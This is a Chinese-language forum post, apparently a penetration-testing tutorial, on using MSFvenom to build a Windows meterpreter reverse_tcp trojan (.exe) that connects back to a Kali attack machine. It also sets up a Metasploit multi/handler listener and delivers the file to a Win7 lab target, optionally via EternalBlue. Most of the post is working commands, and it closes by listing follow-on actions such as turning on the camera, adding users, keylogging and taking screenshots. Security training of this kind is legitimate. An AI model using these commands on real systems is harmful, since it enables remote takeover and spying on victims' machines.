ToB企服应用市场:ToB评测及商务社交产业平台

标题: MSFvenom恶意程序生成与利用 [打印本页]

作者: 用多少眼泪才能让你相信    时间: 2023-11-2 22:49
标题: MSFvenom恶意程序生成与利用
MSFvenom

1.1 MSFvenom介绍

MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Windows,Unix,Nodejs,Cisco等等。

英文介绍来源:https://www.offsec.com(网站有风险打开需谨慎)
1.2 MSFvenom 简单使用

示例说明:今天利用MSFvenom 制作一个 .exe 的木马文件,然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行(这里为了加深了解永恒之蓝操作,也可以手动发送至win7)。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。
1.2.1 MSFvenom手册
  1. #> man msfvenom
复制代码
1.2.2 环境介绍

攻击机:
项目参数备注机器类型攻击机操作系统kaliIP地址192.168.2.214靶机:
项目参数备注机器类型靶机操作系统win7关闭防火墙卸载相关杀毒软件IP地址192.168.2.233
1.2.3 木马文件生成
  1. #>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe
复制代码
命令解说:
命令说明备注windows/meterpreter/reverse_tcp有效载荷类型,可以根据实际情况进行选择LHOST攻击机的IP,即靶机点击程序后回链的ipLPORT攻击机的端口,即靶机点击程序后回链的端口-f输出的格式
1.2.4 设置侦听

启动msfconsole
  1. #> msfconsole
复制代码
设置监听
  1. msf6>use exploit/multi/handler
  2. msf6>set payload windows/meterpreter/reverse_tcp
  3. msf6>set lhost 192.168.2.214 #攻击机ip
  4. msf6>set lport 10200 #链接端口
  5. msf6>exploit/run #运行
复制代码

1.2.5 在靶机中运行程序

将文件拷贝到靶机并运行(直接拷贝或通过永恒之蓝漏洞上传,参考《渗透基础+永恒之蓝演练》)。

1.2.6 程序生效,执行相关SHELL

运行1.exe文件

在运行的瞬间,kali就已经监听并链接成功!下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。

普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4